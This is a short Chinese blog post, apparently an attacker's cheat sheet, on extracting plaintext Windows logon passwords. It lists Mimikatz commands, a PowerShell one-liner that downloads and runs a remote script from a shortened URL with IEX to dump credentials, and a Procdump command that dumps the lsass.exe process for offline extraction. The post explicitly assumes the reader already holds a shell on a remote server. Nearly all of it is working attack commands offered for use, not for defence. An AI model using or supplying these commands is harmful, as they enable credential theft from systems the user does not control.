这篇文章上次修改于 1592 天前,可能其部分内容已经发生变化,如有疑问可询问作者。
1.Mimikatz
作者的博客https://blog.gentilkiwi.com/mimikatz
直达下载地址https://github.com/gentilkiwi/mimikatz
一个通过系统调试,可以直接抓取系统内明文密码的程序。
只能本地权限运行,方法:
第一条:privilege::debug //提升权限 第二条:sekurlsa::logonpasswords //获取密码
powershell调用mimikatz提取密码:
powershell "IEX (New-Object Net.WebClient).DownloadString('https://is.gd/oeoFuI'); Invoke-Mimikatz -DumpCreds"
2.prodump
因为mimikatz一般都是登录的远程服务器本地运行。当我们只有shell,而shell又足够大,没有登录3389的需求时,可以使用微软的prodump导出lsass.exe进程,下载回来然后本地导入mimikatz获取明文密码。
NT5以上使用微软的Procdump工具
Procdump: https://technet.microsoft.com/en-us/sysinternals/dd996900.aspx
操作命令:
Procdump.exe -accepteula -ma lsass.exe lsass.dmp
之后我们就可以得到远程机器的明文密码了。命令如下:
>>mimikatz # sekurlsa::minidump SUPERCOMPUTER_lsass.dmp Switch to MINIDUMP >>mimikatz # sekurlsa::logonPasswords full
没有评论